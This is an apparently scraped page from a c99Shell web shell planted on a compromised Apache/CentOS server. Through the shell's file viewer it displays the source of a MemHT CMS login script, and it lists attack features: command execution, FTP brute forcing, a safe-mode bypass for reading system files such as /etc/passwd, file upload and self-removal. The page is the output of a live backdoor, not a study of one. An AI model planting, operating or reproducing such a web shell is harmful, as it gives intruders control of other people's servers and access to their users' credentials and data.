!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/inc/   drwxrwxrwx
Free 52.2 GB of 127.8 GB (40.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     inc_login.php (6.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 (GPLv2)
	or write to the Free Software Foundation, Inc., 51 Franklin Street,
	Fifth Floor, Boston, MA02110-1301, USA.
		
********************************************************************************/

if (stristr(htmlentities($_SERVER['PHP_SELF']), "inc_login.php")) {
	die("
Error: This file cannot be opened directly!
"); } global $dblink,$page,$tzNOW; //================================== // Find IP //================================== if (@getenv("HTTP_CLIENT_IP")) { $visitorInfo['ip'] = getenv("HTTP_CLIENT_IP"); } else if (@getenv("HTTP_X_FORWARDED_FOR")) { $visitorInfo['ip'] = getenv('HTTP_X_FORWARDED_FOR'); } else if (@getenv('REMOTE_ADDR')) { $visitorInfo['ip'] = getenv('REMOTE_ADDR'); } else if (isset($_SERVER['REMOTE_ADDR'])) { $visitorInfo['ip'] = $_SERVER['REMOTE_ADDR']; } else { $visitorInfo['ip'] = "Unknown"; } if (!eregi("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$visitorInfo['ip']) AND $visitorInfo['ip']!="Unknown") { $pos = strpos($visitorInfo['ip'],","); $visitorInfo['ip'] = substr($visitorInfo['ip'],0,$pos); if ($visitorInfo['ip']=="") { $visitorInfo['ip'] = "Unknown"; } } $visitorInfo['ip'] = eregi_replace("[^0-9\.]","",$visitorInfo['ip']); function clear() { global $cookiecontent,$cookieitem,$cookie_id,$cookie_user,$cookie_pass,$cookcheck,$dblogin_user,$dblogin_pass,$user,$userid,$admin; unset ($cookiecontent,$cookieitem,$cookie_id,$cookie_user,$cookie_pass,$cookcheck,$dblogin_user,$dblogin_pass,$user,$userid,$admin); } //=========================================== //Post LoginForm //=========================================== if (memRunHooks('UserPostLoginCheck',array(&$privs))) { if (!function_exists("inCode_t")) { function inCode_t($string) { if (get_magic_quotes_gpc()) { $string = stripslashes($string); } $string = htmlentities($string,ENT_QUOTES); return mysql_real_escape_string($string); } } if (isset($_POST['login']) AND isset($_POST['post_username']) AND isset($_POST['post_password'])) { if ($dblink->get_num("SELECT attempts FROM memht_login_flood WHERE ip='".$visitorInfo['ip']."' AND attempts>=5")) { die(_YOUMUSTWAITTOLOGINAGAIN_); } else { if ($chk = $dblink->get_row("SELECT id,user,enabled FROM memht_utenti WHERE user='".inCode_t($_POST['post_username'])."' AND pass='".md5($_POST['post_password'])."'")) { //Login Correct $login_id = intval($chk['id']); $login_user = $chk['user']; $login_enabled = intval($chk['enabled']); if ($login_enabled) { //Update account lastlogin and lastip $dblink->query("UPDATE memht_utenti SET lastip='".$visitorInfo['ip']."',lastlogin=$tzNOW WHERE id=$login_id"); //Account Ok $cookiecontent = $login_id."#".md5($login_user)."#".md5($_POST['post_password']); setcookie("login_user",$cookiecontent,time()+604800); //1week $userid = $login_id; $privs['user'] = $cookiecontent; } else { //Account Disabled clear(); $userid = 0; $privs['user'] = false; setcookie("login_user","",time()-31536000); //-1year } } else { clear(); $userid = 0; $privs['user'] = false; setcookie("login_user","",time()-31536000); //-1year //Login Failed -> Antiflood/hack system (Attempts Limiter) if ($dblink->get_num("SELECT ip FROM memht_login_flood WHERE ip='".$visitorInfo['ip']."'")>0) { $dblink->query("UPDATE memht_login_flood SET time=$tzNOW,attempts=attempts+1 WHERE ip='".$visitorInfo['ip']."'"); } else { $dblink->query("INSERT INTO memht_login_flood (ip,time,attempts) VALUES ('".$visitorInfo['ip']."',$tzNOW,'1')"); } } @session_start(); $redirect_url = @$_SESSION['redirect_url']; $redirect_age = @$_SESSION['redirect_age']+90; if ($redirect_url!="" AND $redirect_age>=time()) { $_SESSION['redirect_url'] = ""; $_SESSION['redirect_age'] = 0; header("Location: $redirect_url"); } else { $_SESSION['redirect_url'] = ""; $_SESSION['redirect_age'] = 0; header("Location: index.php?page=users"); } } } memRunHooks('UserPostLoginCheckEnd',array(&$privs)); } //=========================================== //Stored Cookie //=========================================== if (memRunHooks('UserCookieLoginCheck',array(&$privs))) { if (isset($_COOKIE['login_user'])) { $cookiecontent = $_COOKIE['login_user']; $cookieitem = explode("#",$cookiecontent); $cookie_id = intval($cookieitem[0]); $cookie_user = $cookieitem[1]; //md5 $cookie_pass = $cookieitem[2]; //md5 //Database Account Control $cookcheck = $dblink->get_row("SELECT user,pass FROM memht_utenti WHERE id=$cookie_id"); if ($cookcheck) { $dblogin_user = $cookcheck['user']; $dblogin_pass = $cookcheck['pass']; //md5 if ($cookie_user==md5($dblogin_user) AND $cookie_pass==$dblogin_pass) { //Login Correct $userid = $cookie_id; $privs['user'] = $cookiecontent; //Update account lastlogin and lastip $dblink->query("UPDATE memht_utenti SET lastip='".$visitorInfo['ip']."',lastlogin=$tzNOW WHERE id=$userid"); } else { //Delete Cookie (Error? Hack?) clear(); $userid = 0; $privs['user'] = false; setcookie("login_user","",time()-31536000); //-1year } } } else { $userid = 0; $privs['user'] = false; } memRunHooks('UserCookieLoginCheckEnd',array(&$privs)); } //=========================================== //User logout //=========================================== if (memRunHooks('UserLogout',array(&$privs))) { if (isset($_GET['logout']) && $_GET['logout']==1) { clear(); $privs['user'] = false; setcookie("login_user","",time()-31536000); //-1year header("Location: index.php"); } memRunHooks('UserLogoutEnd',array(&$privs)); } ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--